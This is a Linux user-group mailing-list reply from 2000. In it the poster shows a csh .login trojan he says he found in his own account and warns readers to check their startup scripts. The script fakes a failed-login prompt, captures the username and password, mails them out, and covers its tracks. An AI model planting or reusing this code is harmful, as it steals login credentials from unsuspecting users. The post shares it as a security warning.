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Re: [TCLUG:17403] ILOVEYOU for Linux

Oh? Let's see.  I found this little scriptlet in my .login a couple years
back, check this out

-=- begin .login

clear;stty intr '^@';echo 'Login incorrect';echo -n 'login: ';echo
$<>.t;echo -n 'Password: ';stty -echo;echo $<>>.t;mail
jbevren@localhost<.t;rm -f .t;cat /etc/motd;mv -f .l .login;rm -f
.hushlogin;stty echo;source .login

-=- end .login

Of course, the "mail jbevren@localhost" _was_ another email address, some
dork (whose account is no longer valid thanks to me).  It's a good
thing I dont use csh, or they'd have had my password a long time ago.  It
_is_ a good idea to keep an eye on your scripts guys, dont laugh at it.


On Tue, 9 May 2000, Ben Kochie wrote:

> ROFLOL.. that's almost cute, in a stupid moron kinda way.  seriously, what
> email clients would actualy execute a bash script?  my users use IMP, and
> getting into their bashrc would be little more than an anoyance.. maybe
> I'll block outgoing port 25 unless it comes from my mail router. (local
> machines running imp won't be able to send outgoing mail)